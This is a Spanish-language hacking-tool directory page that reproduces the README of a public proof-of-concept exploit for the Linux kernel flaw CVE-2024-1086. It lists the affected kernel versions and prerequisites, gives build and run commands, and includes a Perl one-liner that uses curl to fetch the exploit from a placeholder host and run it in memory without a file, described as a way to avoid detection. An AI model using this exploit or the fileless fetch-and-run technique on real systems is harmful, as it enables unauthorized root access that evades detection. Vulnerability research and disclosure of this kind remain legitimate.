Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-1086 | Kitploit
Herramientas/GitHubGitHub/b1nhack/cve-2024-1086
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPapers e InvestigaciónAprendizaje y EducaciónExplotación de Binarios
GitHubb1nhack/cve-2024-1086

CVE-2024-1086

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-1086

Prueba de concepto (Proof-of-Concept) universal de escalada de privilegios local para CVE-2024-1086, que funciona en la mayoría de los kernels de Linux entre v5.14 y v6.6, incluyendo Debian, Ubuntu y KernelCTF. La tasa de éxito es del 99.4% en las imágenes de KernelCTF.

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

Entrada de blog / Write-up

Un write-up completo del exploit, incluida la información de contexto y un montón de diagramas útiles, se puede encontrar en la entrada de blog Flipping Pages.

Versiones afectadas

El exploit afecta a las versiones desde (incluida) v5.14 hasta (incluida) v6.6, excluyendo las ramas parcheadas v5.15.149>, v6.1.76>, v6.6.15>. El parche para estas versiones se publicó en febrero de 2024. La vulnerabilidad subyacente afecta a todas las versiones (excluyendo las ramas estables parcheadas) desde v3.15 hasta v6.8-rc1.

Advertencias:

  • El exploit no funciona en kernels v6.4> con el kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (incluyendo Ubuntu v6.5)
  • El exploit requiere namespaces de usuario (kconfig CONFIG_USER_NS=y), que esos namespaces de usuario no tengan privilegios (comando sh sysctl kernel.unprivileged_userns_clone = 1), y que nf_tables esté habilitado (kconfig CONFIG_NF_TABLES=y). Por defecto, todo esto está habilitado en Debian, Ubuntu y KernelCTF. Otras distribuciones no han sido probadas, pero podrían funcionar también. Adicionalmente, el exploit solo ha sido probado en x64/amd64.
  • El exploit puede ser muy inestable en sistemas con mucha actividad de red
    • Los sistemas con adaptador WiFi, cuando están rodeados de redes WiFi de alto uso, serán muy inestables.
    • En los dispositivos de prueba, por favor desactive los adaptadores WiFi a través de la BIOS.
  • El pánico del kernel (bloqueo del sistema) después de ejecutar el exploit es un efecto secundario que deliberadamente no ha sido corregido para prevenir el uso malicioso del exploit (es decir, los intentos de explotación ahora deberían ser más notorios e impracticables en operaciones del mundo real). A pesar de esto, todavía permite una prueba de concepto funcional en entornos de laboratorio, ya que la shell root es funcional y la persistencia a través del disco es posible.

Uso

Configuración

Los valores predeterminados deberían funcionar directamente en Debian, Ubuntu y KernelCTF con una shell local. En configuraciones/distribuciones no probadas, asegúrese de que los valores de kconfig coincidan con el kernel objetivo. Estos se pueden especificar en src/config.h. Si está ejecutando el exploit en una máquina con más de 32GiB de memoria física, asegúrese de aumentar CONFIG_PHYS_MEM. Si está ejecutando el exploit a través de SSH (hacia la máquina de prueba) o una shell inversa, es posible que desee cambiar CONFIG_REDIRECT_LOG a 1 para evitar actividad de red innecesaria.

Compilación

Si esto le resulta poco práctico, hay un binario x64 compilado con la configuración predeterminada.

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

Binario: CVE-2024-1086/exploit

Ejecución

Ejecutar el exploit es igual de trivial:

root@kitploit:~
./exploit

La ejecución sin archivos también es compatible, en caso de situaciones de pentest donde sea necesario evitar detecciones. Sin embargo, Perl debe estar instalado en el objetivo:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

Aviso legal

Los programas y scripts ("programas") en este directorio/carpeta/repositorio de software ("repositorio") se publican, desarrollan y distribuyen únicamente con fines educativos/de investigación. Yo ("el creador") no apruebo ningún uso malicioso o ilegal de los programas en este repositorio, ya que la intención es compartir investigación y no realizar actividades ilegales con ella. No soy legalmente responsable de cualquier cosa que hagas con los programas en este repositorio.

Descargar herramienta